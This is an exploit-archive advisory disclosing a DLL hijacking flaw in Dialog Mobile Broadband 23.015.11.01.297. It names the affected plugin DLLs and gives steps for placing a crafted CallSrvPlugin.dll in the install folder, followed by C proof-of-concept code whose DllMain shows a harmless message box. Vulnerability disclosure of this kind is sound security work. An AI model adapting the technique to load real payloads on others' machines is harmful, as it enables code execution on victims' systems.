Home / os / winmobile

Dialog Mobile Broadband 23.015.11.01.297 DLL Hijacking

Posted on 07 November 2017

Vulnerable software .......................... Dialog Mobile Broadband 23.015.11.01.297 Vulnerability type .............................. DLL hijacking vulnerability Affected DLL's.................................... CallSrvPlugin.dll , GpsSrvPlugin.dll , CallAppPlugin.dll , CallLogSrvPlugin.dll , WLANPlugin.dll , CallAppPlugin,MDInterface.dll Vendor url .https://www.dialog.lk Author..Himash Product descriptionDialog mobile broad band is a dongle software (3g modem)for accessing internet. It comes with dialog dongle pre installed. 1. Compile dynamic link library (DLL) 2. Rename to CallSrvPlugin.dll 2. Copy CallSrvPlugin to "C:Program Files (x86)Dialog Mobile Broadband" 3. Launch Dialog Mobile Broadband 4. MessageBox executes that verifies the dll hijacking is successful. Proof of concept Exploit #include <windows.h> int dll_hijack() { MessageBox(0, "found DLL hijacking vulnerability in dialog mobile broadband by himash", "DLL Message", MB_OK); return 0; } BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { dll_hijack(); return 0; }

 

TOP